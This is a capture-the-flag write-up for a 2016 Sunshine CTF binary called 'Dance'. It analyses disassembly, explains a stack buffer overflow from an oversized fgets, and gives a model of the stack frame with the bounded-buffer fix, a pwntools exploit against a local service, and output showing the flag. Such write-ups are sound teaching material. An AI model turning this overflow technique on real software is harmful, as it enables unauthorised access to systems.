[Sunshine CTF 2016] Dance (55 Points)

Problem

Given the file dance_noflag, find its weakness and exploit it!

Solution

Information Gathering

Inspect the binary with checksec, check the file type with file, run the binary normally, and decompile the code with IDA.

$ file dance_noflag
dance_noflag: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=af63a443bb686d83246e6e21c221eab4a40a4188, not stripped

$ checksec dance_noflag
[*] '/home/dummy/Private/0x7079/pwn/sunshine-ctf-2016/dance-55/dance_noflag'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

$ ./dance_noflag 
welcome to the pro club. you just paid a door fee and have no respect. earn ur cred on the dancefloor!
give us ur sick dance moves like so:
whip,naenae,whip,whip,naenae<ENTER>
whip
do the whip!
   (;P)
 8=/||\_
_/¯    ¯\_

cool dance! come again!

Decompilation

push    ebp
mov     ebp, esp
push    esi
sub     esp, 0D4h
mov     eax, 0
mov     ecx, 50h
lea     edx, [ebp+s]
mov     [ebp+var_8], 0
mov     [ebp+var_C], 0
mov     [ebp+var_10], 0
mov     [esp], edx      ; s
mov     dword ptr [esp+4], 0 ; c
mov     dword ptr [esp+8], 50h ; n
mov     [ebp+var_68], eax
mov     [ebp+var_6C], ecx
call    _memset
lea     eax, aWelcomeToThePr ; "welcome to the pro club. you just paid "...
mov     [ebp+var_C], 12ADAAC9h
mov     [esp], eax      ; format
call    _printf
mov     ecx, ds:stdout@@GLIBC_2_0
mov     [esp], ecx      ; stream
mov     [ebp+var_70], eax
call    _fflush
mov     ecx, 59h
lea     edx, [ebp+s]
mov     esi, ds:__bss_start
mov     [esp], edx      ; s
mov     dword ptr [esp+4], 59h ; n
mov     [esp+8], esi    ; stream
mov     [ebp+var_74], eax
mov     [ebp+var_78], ecx
call    _fgets
lea     ecx, [ebp+s]
mov     [ebp+var_64], ecx
mov     [ebp+var_7C], eax

loc_8048641:
mov     eax, [ebp+var_64]
mov     [esp], eax      ; s
call    _strlen
cmp     eax, 0
jbe     loc_804877F


loc_804877F:
cmp     [ebp+var_C], 12ADAAC9h
jnz     loc_80487C6

cmp     [ebp+var_10], 0
jz      loc_80487C1

lea     eax, aGirlUCanDanceW ; "girl u can dance w the best of em. the "...
mov     [esp], eax      ; format
call    _printf
mov     ecx, ds:stdout@@GLIBC_2_0
mov     [esp], ecx      ; stream
mov     [ebp+var_B0], eax
call    _fflush
mov     [ebp+var_B4], eax

The information gathered includes:

  • The binary is protected with NX.
  • The file type is 32-bit Linux.
  • The binary has two options: whip and naenae.
  • There is a conditional check cmp [ebp+var_C], 12ADAAC9h; when the comparison holds, the binary prints the flag.
  • The number of input bytes allowed is 89.

Vulnerability Identification

Based on the information gathered, the weakness is that the binary can be exploited by filling the buffer with 89 bytes composed of: 84 bytes of junk, 4 bytes with the value 0x12ADAAC9, and 1 byte with the value \n.
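To see why that composition works, the following added example (not part of the original writeup) models the stack frame that the disassembly implies and applies the semantics of fgets to it. It assumes that s starts 0x60 bytes below ebp, which is what the 84-byte offset in the writeup implies; the memset size 0x50, the fgets size 0x59, and the offsets var_10 and var_C come from the listing. Note that the block at loc_804877F also requires var_10 to be non-zero before the flag is printed, which the junk bytes satisfy. The model also shows that bounding fgets to the buffer size (0x50) keeps the same input from reaching var_10 and var_C, which is the fix a developer would apply.

```python
import struct

# Frame layout inferred from the disassembly (assumption: s starts at ebp-0x60).
BUF_SIZE = 0x50            # memset(s, 0, 0x50)
FGETS_N = 0x59             # fgets(s, 0x59, stdin): at most 88 bytes stored plus a NUL
OFF_VAR_10 = 0x60 - 0x10   # var_10 sits 80 bytes into s
OFF_VAR_C = 0x60 - 0x0C    # var_C sits 84 bytes into s
MAGIC = 0x12ADAAC9         # value stored in var_C and compared at loc_804877F


def fgets_into(frame, offset, n, data):
    """Model fgets(s, n, stream): store at most n-1 bytes, stop after a newline,
    then NUL-terminate. Returns the number of bytes stored."""
    stored = bytearray()
    for b in data[: n - 1]:
        stored.append(b)
        if b == 0x0A:
            break
    frame[offset:offset + len(stored)] = stored
    frame[offset + len(stored)] = 0
    return len(stored)


def run_check(line, n=FGETS_N):
    """Simulate the frame after fgets with size n and evaluate the two
    conditions that guard the flag: var_C == MAGIC and var_10 != 0."""
    frame = bytearray(0x60 + 16)  # s, var_10, var_C, var_8 and some slack (constructed)
    frame[OFF_VAR_C:OFF_VAR_C + 4] = struct.pack('<I', MAGIC)  # mov [ebp+var_C], 12ADAAC9h
    fgets_into(frame, 0, n, line)
    var_10 = struct.unpack('<I', frame[OFF_VAR_10:OFF_VAR_10 + 4])[0]
    var_c = struct.unpack('<I', frame[OFF_VAR_C:OFF_VAR_C + 4])[0]
    return var_c == MAGIC and var_10 != 0


def build_payload():
    """The 89-byte input described above: 84 junk bytes, the 4-byte magic, a newline."""
    return b'A' * 84 + struct.pack('<I', MAGIC) + b'\n'


if __name__ == '__main__':
    print('normal input reaches flag:', run_check(b'whip,naenae\n'))        # False
    print('89-byte input reaches flag:', run_check(build_payload()))         # True
    print('with fgets bounded to 0x50:', run_check(build_payload(), n=BUF_SIZE))  # False
```

The decisive detail is the mismatch between the 0x50 bytes cleared by memset and the 0x59 bytes fgets is allowed to store: the extra 8 bytes cover exactly var_10 and var_C. Overwriting var_C with the value it already holds keeps the first comparison true, and the junk that lands in var_10 makes the second one true as well.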

Final Step

The script below can be used for the exploitation.

from pwn import *

# Connect to the service (the writeup targets a local instance on port 31337).
host = remote('localhost', 31337)

# 84 bytes of junk, then the 4-byte value that the cmp at loc_804877F expects.
# Bytes are used so the script runs under Python 3 as well as Python 2.
payload = b'A' * 84
payload += p32(0x12ADAAC9)

# sendline appends the trailing '\n', giving the 89-byte input described above.
host.sendline(payload)
log.info(host.recv())

Output.

$ python solver.py
[+] Opening connection to localhost on port 31337: Done
[*] welcome to the pro club. you just paid a door fee and have no respect. earn ur cred on the dancefloor!
    give us ur sick dance moves like so:
    whip,naenae,whip,whip,naenae<ENTER>
    girl u can dance w the best of em. the pw to our vip lounge is: this-is-the-flag-on-srv

    cool dance! come again!
[*] Closed connection to localhost port 31337

Conclusion

The binary is exploited by overwriting the stack so that the variable takes the desired value.
